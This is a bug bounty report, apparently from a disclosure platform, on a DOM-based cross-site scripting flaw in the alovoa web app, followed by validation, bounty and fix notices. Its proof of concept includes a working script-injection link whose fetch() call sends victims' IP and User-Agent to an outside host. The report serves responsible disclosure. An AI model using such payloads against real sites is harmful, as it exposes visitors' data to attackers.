Cross-site Scripting (XSS) - DOM in alovoa/alovoa

Valid
Reported on Jul 19th 2021

✍️ Description

It is possible to run JavaScript code in the webpage by DOM unsanitized properties. The function onChangeLocal sets the value of window.location.search directly from the URL, without previous checks.

🕵️‍♂️ Proof of Concept

// Vulnerable function in file fragments.html:139
<script>
function onChangeLocal(e) {
let val = e.options[e.selectedIndex].value;
console.log(val);
window.location.search = val;
}
</script>

A quick example can be done obtaining IP and User-Agent info from a victim: The attacker sets a webserver. For poc purposes, a Pipedream URL was used: https://en8ysa1cvfw0x29.m.pipedream.net

The attacker also sends the following link to the victim: https://alovoa.com/?lang=es"><script>fetch("https://en8ysa1cvfw0x29.m.pipedream.net")</script>

So the val will be set with the malicious payload.

When the victim opens the link, the attacker gets the IP and User-Agent.

Figure

💥 Impact

This could be useful for an attacker to make users execute a malicious link and then get personal information or do other malicious actions.

Ileana Barrionuevo modified their report
7 days ago
We have contacted a member of the alovoa team and are waiting to hear back 7 days ago
Nho Quy Dinh validated this vulnerability 7 days ago
Ileana Barrionuevo has been awarded the disclosure bounty
$25
The fix bounty is now up for grabs
$6.25
Nho Quy Dinh confirmed that a fix has been merged on 01ae69 7 days ago
Nho Quy Dinh has been awarded the fix bounty
$6.25
amammad
7 days ago

dear Ileana Barrionuevo , I don't like to find bug on repositories that already someone working on it, so if you let me I work on Alovoa, your friend, Amammad.

Ileana
7 days ago

Researcher


Hi Amammad, I don't have any problem :) Four eyes see better than two ones. :D